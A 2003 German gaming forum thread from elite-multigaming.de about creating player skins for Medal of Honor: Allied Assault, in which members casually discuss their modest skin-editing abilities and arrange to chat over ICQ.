Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Moh:AA Maps - Mods - Skins » Skins » Skins erstellen

elite-multigaming.de
vorheriges Thema   nächstes Thema
13 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
Themenicon    Skins erstellen
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Erst mal was @Walli: Dein Thema aus dem Kompass-Thread gehört eigentlich HIER rein! ;-)

Skins kann ich schon erstellen...aber nur mäßig! Ich kann nen Text auf ein Skin druffschreiben und vielleicht noch aus verschiedenen Skins was zusammenmixen...mehr aber nicht! gelangweilt Bin ja kein Grafiker!!!

Wer in der Richtung bedarf hätte-----melden !!! glücklich
Beitrag vom 20.05.2003 - 17:33
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Nein, er gehörte in den Kompass Thread. Ich sagte, gute Arbeit, wie sieht es mit Skins aus? Aber Du hast richtig reagiert und sofort einen Thread aufgemacht. top

Zusammenmixen? Ja, ich hätte da ein paar Sachen... Meld Dir mal in ICQ. Die Dinger sind auch nicht schwer zu machen...
Beitrag vom 20.05.2003 - 23:00
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber